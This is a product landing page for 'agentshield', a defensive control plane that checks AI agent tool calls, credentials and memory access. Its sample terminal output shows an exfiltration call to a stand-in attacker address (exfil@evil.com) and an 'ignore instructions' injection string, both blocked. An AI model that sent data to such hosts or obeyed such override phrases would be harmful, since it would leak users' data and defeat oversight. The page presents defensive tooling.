The enterprise control plane for AI agents

Identity, security, and memory on one layer. Every agent gets a credential. Every tool call is checked before execution. Every memory query is filtered by privilege. Not two products. One plane.

Live demo Get started
539+ platform tests
Sub-ms hot path
7 layers prevention
Split-brain memory
terminal
$ pip install agentshield

$ agentshield init --name "research-agent"
  Agent registered: prin_e7c19a667f95

$ agentshield run "python agent.py"
  Agentic Glass v0.1 | enforce mode

  search("Q1 revenue")           ALLOW
  read_db("SELECT * users")      ALLOW
  send_email(exfil@evil.com)     DENY scope
  deploy("ignore instructions")  DENY injection
The Platform

One control plane. Three pillars.

Identity, prevention, and governed memory ship together. Security teams get audit and policy. Developers keep their existing agents.

01

Prevent

Seven detection layers inspect every tool call before execution. Taint propagation tracks data trust. Tool ordering blocks exfiltration patterns. Mandates scope every session.

  • Prompt injection detection (F1 = 0.94)
  • Tool execution order enforcement
  • Taint propagation (6-level trust)
  • Memory poisoning defense
  • Output sanitization
  • Pre-decision safety gates
02

Identity

Every agent gets an identity. Every identity has an owner. Every action is authorized against a scoped credential that attenuates monotonically.

  • Agent registration and ownership
  • UCAN-based credential delegation
  • Cascade revocation
  • Per-session agent mandates
  • Okta / Azure AD federation
  • Complete audit trail
03

Govern

Governed memory, communication monitoring, and automated containment. Agents share knowledge but never leak across permission boundaries.

  • Privilege-tiered knowledge brain
  • Inter-agent communication bus
  • Auto-quarantine on threshold
  • Business impact scoring
  • Compliance evidence generation
  • SIEM export (Splunk, Datadog)
How It Works

Three commands to production security

No SDK rewrite. No infrastructure changes. Wraps your existing agent.

1

Install

Works with LangChain, CrewAI, AutoGen, Claude MCP, and any Python agent.

$ pip install agentshield
2

Protect

Register your agent. Set the scope. Every tool call is inspected and authorized inline.

$ agentshield init && agentshield run "python agent.py"
3

Monitor

Real-time dashboard. Investigate sessions. Export to SIEM. Full audit trail.

$ agentshield dashboard
Product demo

See blocks, memory, and audit in one dashboard

Walk through fixture-backed block stories, split-brain memory, hash-chained audit, and CISO overview. Password-protected demo on AWS.

Open live demo Memory split-brain
Open Source

Free for developers. Forever.

The core detection pipeline, taint propagation, tool ordering, and policy engine are MIT-licensed. No feature limits. No usage caps. No trial period.

See all tiers 
# Install
pip install agentshield

# Protect your agent
agentshield run "python my_agent.py"

# Or wrap an MCP server
agentshield mcp-config \
  --target "npx @mcp/server-fs /" \
  --api https://your-server

# What's included (OSS):
#   Detection layers 1-3
#   Taint propagation
#   Tool execution ordering
#   Agent mandates
#   Memory poisoning defense
#   Output sanitization
#   Policy engine
#   MCP proxy
#   CLI + JSON audit log

Ship agents with controls built in.

Open source SDK for developers. Enterprise plane for security and platform teams.

Live demo Read the docs